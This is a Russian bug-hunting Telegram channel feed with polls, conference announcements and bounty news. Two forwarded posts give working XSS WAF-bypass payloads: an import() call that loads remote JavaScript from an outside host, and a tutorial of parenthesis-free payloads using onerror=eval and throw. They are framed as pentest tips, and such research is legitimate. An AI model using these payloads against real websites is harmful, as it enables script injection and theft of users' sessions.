Багхантер – Telegram
Багхантер
4.44K subscribers
470 photos
68 videos
3 files
376 links
🌏 Канал о багхантинге от багхантера.
Реклама - https://news.1rj.ru/str/bughunter_circuit/702
Чат канала - @bugbounty_chat
Standoff - standoff365.com/profile/circuit
Download Telegram
🧐 Квантовый компьютер

Я уже давал свои предсказания насчет AI-багхантеров и вирусов с мозгами, как оказалось они были правильные. Теперь хочу рассказать про квантовые компьютеры. Мне кажется, что некоторые страны уже располагают реальными квантовыми компьютерами, и уже даже потенциально могут их применять в каких-то секретных спецоперациях. Могут, например, что-то взломать с помощью квантового компьютера, а тех кого взломали - они даже об этом, вероятно, могут и не узнать. Понятно, что Bitcoin никто рушить не будет, вычислить приватный ключ по публичному и слить кучу биткоинов - хоть это и возможно, это может быть слишком палевно. Но, например, HTTPS трафик для квантового комьютера прозрачен - можно прочитать, учитывая что он может накапливаться уже прямо сейчас. Я много общался со специалистами по информационной безопасности со всего мира, но никогда разговор не заходил про постквантовую криптографию. О ней даже не думают? Я считаю о ней нужно задуматься уже сейчас, потому-что переход и подготовка займут годы.
🔥8😨21👏1
Forwarded from SHADOW:Group
Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как alert, document.cookie и других.

В таких случаях часто на помощь приходит функция import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации.

Для эксплуатации я использовал пэйлоад Javanoscript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert.

Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ #. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.

javanoscript:import('//X55.is')//#alert('shdw')


#web #waf #xss
11🔥6👍3
⚡️ Данные пользователей Госуслуг надёжно защищены

Специалисты Минцифры проверили информацию о якобы случившейся утечке из мессенджера Max, размещённую в анонимных каналах.

Автором информации об утечке был выложен сэмпл, содержащий 15 записей, в которых были указаны якобы ID пользователей Госуслуг. Проверка показала, что ни по одной из опубликованных записей ID Госуслуг не совпадает с ФИО реальных пользователей.

Из чего можно сделать вывод, что публикации о взломе сфабрикованы.

@mintsifry #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
🥴10👍4🤮3🤝2
🔥 НОВЫЕ ПРОГРАММЫ БАГБАУНТИ 🔥

Сегодня, 25 октября 2025 года, мы проверили крупнейшие российские платформы Bug Bounty:
- Standoff365
- BI.ZONE Bug Bounty
- BugBounty.ru

К сожалению, новых программ за последний день не обнаружено. 😔

💡 Совет для багхантеров:
Нет новых программ? Это отличный повод вернуться к уже существующим!
1. Повторное тестирование: Проверьте программы, которые давно не обновлялись. Возможно, там появились новые функции или были внесены изменения, которые могли создать новые векторы атаки.
2. Фокус на приватных программах: Активно участвуйте в публичных программах, чтобы повысить свой рейтинг и получить приглашения в более выгодные приватные программы.
3. Изучение отчетов: Читайте публичные отчеты (Disclosed Reports) на платформах, чтобы понять, какие типы уязвимостей наиболее актуальны и востребованы.

Всем удачной охоты! 🕵️‍♂️
🤣14🥴3🤝3💅2
🧐 Хочется навести какой-то суеты в сообществе, как-то стало скучно в последнее время. Согласны? Поэтому я решил устроить опрос, чтобы выяснить какая багбаунти-платформа в России сейчас ТОП-1 по мнению сообщества. Никаких правил в опросе нет (накрутки разрешены). Все в одинаковых условиях, поэтому я буду считать результат, который мы получим, правильным. В субботу вечером в 21:00 я остановлю голосование и подведем итоги. Интересно к чему это приведет. Я сделаю обзор в своём стиле для багбаунти платформы, которая победит.
🍓2🗿2🎄1
ТОП-1 БАГБАУНТИ ПЛАТФОРМА
Final Results
53%
Standoff 365 Bug Bounty
34%
BI.ZONE Bug Bounty
13%
Bug Bounty Ru
🥴13🫡4🌚2🤩1
Forwarded from ZeroNights
Надеемся, вы уже закончили рабочий день! 🤪 Потому что пришло время остановить мгновенье и узнать, какие еще доклады будут на Offensive Track конференции ZeroNights 2025

"Солевые приключения" — Павел Топорков

Как не уйти с пентеста несолоно хлебавши и найти ту самую рану в инфраструктуре, на которую можно насыпать соль. Рассказ о том, как устроен SaltStack, как его ломать, и в чём его соль, вы услышите на самом солёном докладе "Солевые приключения".


"Что в дашборде твоём? Я просто хотел посмотреть метрики..." — Сергей Гордейчик

Мониторинг — это не только про графики и тихие радости девопса, это и про стремительный pwn. Мы покажем, как через Grafana и, особенно, в связке с Prometheus и прочими k8s можно получить доступ к чувствительным данным, обойти ограничения сети и начать внутреннюю разведку — даже без yet another CVE. Доклад основан на живом исследовании с практическими примерами и тулами.


"Современные авто: от секретов в прошивке ЭБУ до удаленного "окирпичивания" целого автопарка" — Сергей Ануфриенко, Александр Козлов

Все мы в той или иной степени осведомлены о том, что подключенные устройства (IoT) нередко оказываются уязвимыми с точки зрения информационной безопасности. В то же время сегодня значительная часть современных автомобилей является подключенной — имеет связь с облачными сервисами производителя. В нашем докладе мы на конкретных примерах покажем, с какими уязвимостями в автомобильных блоках мы сталкивались в своей работе, какие сценарии атак возможны через доступные интерфейсы (включая СМС сообщения и облачную инфраструктуру) и какие последствия это может иметь для безопасности и эксплуатации транспортных средств.


Мы будем добавлять доклады по мере их утверждения. Полный вариант программы вы всегда найдете по ссылке на нашем сайте конференции ZeroNights 2025 👍
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2💅2😁1😨1
В паблик вышла программа Контур, где можно заработать 1 миллион рублей за критические уязвимости. Огромное пространство для поиска дыр, а для тех кто любит финансовые приложения - у них даже банк есть - Контур.Банк. Ломал кто-то его? Но даже если и ломали, у меня для вас хорошая новость. В таких программах сайты регулярно обновляются, наверное почти каждый день - завозят новые уязвимости. Поэтому кто еще не выбрал себе прогу, рекомендую в целом для взлома - интересная программа.

3I/ATLAS
🔥9😁32
Багхантер
ТОП-1 БАГБАУНТИ ПЛАТФОРМА
🔥🔥🔥 Standoff 365 Bug Bounty ТОП-1 БАГБАУНТИ ПЛАТФОРМА ПО МНЕНИЮ СООБЩЕСТВА. В опросе приняли участие 498 человек, 265 человек проголосовали за ТОП-1 платформу.

Скоро будет обзор
11🔥3👍2👏1
Багхантер pinned «🔥🔥🔥 Standoff 365 Bug Bounty ТОП-1 БАГБАУНТИ ПЛАТФОРМА ПО МНЕНИЮ СООБЩЕСТВА. В опросе приняли участие 498 человек, 265 человек проголосовали за ТОП-1 платформу. Скоро будет обзор»
🔥 Расследование

Кажется на ZeroNights уже можно купить билеты. Я решил проверить, действительно ли это так и перешел по ссылке https://zeronights.ru/#tickets чтобы увидеть это своими глазами. И действительно - продажи билетов оказались открыты. Удалось выяснить что билет для студентов стоит 3500 рублей, а физические лица, желающие попасть на спикер-пати, должны заплатить 25000 рублей. Кроме этого, навигация по сайту показала, что в разделе "Программа" уже даже сейчас можно ознакомиться с программой мероприятия и выбрать доклад, чтобы потом его посмотреть.
🤡21😁8🤔1🤬1
8💅4
🇷🇺 Мы с Пашкой поздравляем всех подписчиков с Днём народного единства
🔥21🤮11👍5🥴2
This media is not supported in the widget
VIEW IN TELEGRAM
1🤮75🤡18😎9🤨1
Forwarded from Standoff Bug Bounty Tips
🤔 Эксплуатация XSS без скобок и точек с запятой

Главная цель — обход WAF, который блокирует типичные паттерны XSS.

Как это работает ⤵️

🔴 С помощью запятых можно объединить несколько выражений и вернуть последнее из них
🔴 Замена onerror на eval позволяет выполнить сообщение об ошибке как код
🔴 Вызванные ошибки станут частью сообщения об ошибке
🔴 Если тебе удалось преобразовать сообщение об ошибке в корректный код, значит, ты справился

➡️ Tagged Template Strings

Базовый прием — использование функции перед шаблонной строкой:

alert`test`


Более продвинутый вариант — создание функции из строки:

Function`alert\u00281\u0029` ``


Здесь скобки заменены на unicode-представление (\u0028 и \u0029).

Динамическое выполнение кода через hash:

Function`_${location.hash.slice`1`}` ``


➡️ Метод onerror + throw (Chrome)

Ключевая идея: подмена onerror на eval и создание валидного JS-кода из сообщения об ошибке:

onerror = eval
throw '=alert\x281\u0029'


Сообщение об ошибке в Chrome: Uncaught =alert(1), что является валидным кодом (Uncaught становится переменной).

Без точки с запятой (используя блок):

{onerror=alert}throw 1


Или через запятую:

throw onerror=alert,1


➡️ Метод для Firefox

В Firefox формат ошибок другой, поэтому используются объекты Error:

throw onerror=eval,x=new Error,x.message='alert\x281\x29',x


➡️ Продвинутые техники

Пейлоад через regexp и конкатенацию:

throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337,3331,117]+a[13]


Здесь:

🔴 a[12] и a[13] извлекают ( и ) из строки функции URL
🔴 /1/g — regexp, который в строке становится "/1/g"
🔴 Итоговое сообщение: Uncaught /1/g(1337,3331,117) — валидный код

Манипуляция с TypeError.prototype.name:

TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']


Изменяется имя TypeError, чтобы сообщение об ошибке начиналось с =/, формируя regexp, который комбинируется с -alert(1).

💡 Пост вдохновлен несколькими исследованиями по теме:

✳️ Explaining XSS without parentheses and semi-colons
✳️ XSS technique without parentheses
✳️ XSS without parentheses and semi-colons
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🤡3